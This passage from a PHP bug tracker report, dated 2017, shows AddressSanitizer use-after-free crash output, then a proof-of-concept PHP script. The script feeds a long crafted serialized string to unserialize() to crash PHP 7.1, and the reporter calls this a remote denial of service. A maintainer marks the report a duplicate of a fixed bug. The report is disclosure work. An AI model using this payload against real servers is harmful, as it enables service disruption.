Shadow bytes around the buggy address:
  0x0c247fffb350: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb380: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb3a0: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb3b0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb3c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29990==ABORTING
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
-Operating System: Test on Ubuntu 16.04 x64 +Operating System: Ubuntu 1604 & Windows10 -PHP Version: 7.1.5 +PHP Version: 7.1.6
 [2017-06-09 09:50 UTC] varsleak at gmail dot com
add new PoC:
<?php
    $crashed_data ='O:9:"AAAAAAAAA":1:0S:1:"0";a:15:{s:8:"AAAAAAAA";i:-0;s:1:"m";i:0;s:1:"d";i:0;s:1:"i";i:00;s:1:"i";i:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:123:{s:1:"y";i:2;s:8:"AAAAAAAA";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:8:"AAAAAAAA";d:000;s:1:"i";i:10;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;i:0;a:1:{i:0;r:6;}i:1;a:200000000000000000000000000000000:{s:1:"y";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"d";i:2;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:2:"Ad";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:1;s:1:"s";d:1;s:1:"2";R:+7;s:1:"s";i:-6;s:1:"y";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"0010day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"1";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"6";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"3";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"-000day";d:1;s:1:"i";R:+7;s:1:"s";i:6;s:7:"-000day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:2:"0y";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";';
    unserialize($crashed_data);
?>
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
It will cause a Remote Denial of Service vulnerability.
 [2017-08-12 13:14 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-08-12 13:14 UTC] nikic@php.net
This is a duplicate of bug #74103, which is now fixed.
 
PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Sun Sep 23 06:01:25 2018 UTC